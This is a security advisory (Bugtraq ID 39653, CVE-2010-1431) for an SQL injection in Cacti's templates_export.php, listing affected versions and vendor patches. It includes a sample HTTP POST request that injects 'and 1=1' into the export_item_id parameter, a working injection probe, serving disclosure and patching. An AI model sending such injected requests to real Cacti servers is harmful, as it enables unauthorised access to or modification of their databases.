Cacti 'export_item_id' Parameter SQL Injection Vulnerability
BID:39653
Info
Cacti 'export_item_id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39653 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1431 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 17 2010 12:00AM |
| Updated: | Aug 20 2010 10:53AM |
| Credit: | Nahuel Grisolia |
| Vulnerable: |
S.u.S.E. openSUSE 11.0 Redhat HPC Solution EL5 5 Planet Technology WSW-2401 0.8.6 h Planet Technology WSW-2401 0.8.6 g MandrakeSoft Enterprise Server 5 x86_64 MandrakeSoft Enterprise Server 5 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 4.0 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0 m68k Debian Linux 5.0 ia-64 Debian Linux 5.0 ia-32 Debian Linux 5.0 hppa Debian Linux 5.0 armel Debian Linux 5.0 arm Debian Linux 5.0 amd64 Debian Linux 5.0 alpha Debian Linux 5.0 Cacti Cacti 0.8.7 Cacti Cacti 0.8.6 f Cacti Cacti 0.8.6 c Cacti Cacti 0.8.5 a Cacti Cacti 0.8.5 Cacti Cacti 0.8.4 Cacti Cacti 0.8.3 a Cacti Cacti 0.8.3 Cacti Cacti 0.8.2 a Cacti Cacti 0.8.2 Cacti Cacti 0.8.1 Cacti Cacti 0.8 Cacti Cacti 0.8.7e Cacti Cacti 0.8.7d Cacti Cacti 0.8.7c Cacti Cacti 0.8.7b Cacti Cacti 0.8.7a Cacti Cacti 0.8.6k Cacti Cacti 0.8.6j Cacti Cacti 0.8.6i |
| Not Vulnerable: | |
Discussion
Cacti 'export_item_id' Parameter SQL Injection Vulnerability
Cacti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cacti versions 0.8.7e and prior are vulnerable.
Cacti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cacti versions 0.8.7e and prior are vulnerable.
Exploit / POC
Cacti 'export_item_id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example request is available:
POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://www.example.com7/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
Attackers can use a browser to exploit this issue.
The following example request is available:
POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://www.example.com7/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
Solution / Fix
Cacti 'export_item_id' Parameter SQL Injection Vulnerability
Solution:
Updates are available. Please see the references for more information.
Debian Linux 5.0 ia-64
MandrakeSoft Enterprise Server 5 x86_64
Debian Linux 5.0 alpha
Debian Linux 5.0 ia-32
MandrakeSoft Enterprise Server 5
Debian Linux 5.0 s/390
Debian Linux 5.0 mipsel
Debian Linux 5.0 hppa
Cacti Cacti 0.8.7e
Debian Linux 5.0 m68k
Debian Linux 5.0 arm
Debian Linux 5.0 armel
MandrakeSoft Corporate Server 4.0
Debian Linux 5.0
Debian Linux 5.0 amd64
Debian Linux 5.0 mips
Debian Linux 5.0 powerpc
Debian Linux 5.0 sparc
MandrakeSoft Corporate Server 4.0 x86_64
Solution:
Updates are available. Please see the references for more information.
Debian Linux 5.0 ia-64
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
MandrakeSoft Enterprise Server 5 x86_64
-
Mandriva cacti-0.8.7e-11.1mdvmes5.1.noarch.rpm
http://www.mandriva.com/en/download/
Debian Linux 5.0 alpha
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 ia-32
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
MandrakeSoft Enterprise Server 5
-
Mandriva cacti-0.8.7e-11.1mdvmes5.1.noarch.rpm
http://www.mandriva.com/en/download/
Debian Linux 5.0 s/390
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 mipsel
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 hppa
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Cacti Cacti 0.8.7e
-
Cacti sql_injection_template_export.patch
http://www.cacti.net/downloads/patches/0.8.7e/sql_injection_template_e xport.patch
Debian Linux 5.0 m68k
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 arm
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 armel
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
MandrakeSoft Corporate Server 4.0
-
Mandriva cacti-0.8.7e-0.1.20060mlcs4.noarch.rpm
http://www.mandriva.com/en/download/
Debian Linux 5.0
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 amd64
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 mips
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 powerpc
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
Debian Linux 5.0 sparc
-
Debian cacti_0.8.7b-2.1+lenny1_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny1_all.deb -
Debian cacti_0.8.7b-2.1+lenny2_all.deb
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+ lenny2_all.deb
MandrakeSoft Corporate Server 4.0 x86_64
-
Mandriva cacti-0.8.7e-0.1.20060mlcs4.noarch.rpm
http://www.mandriva.com/en/download/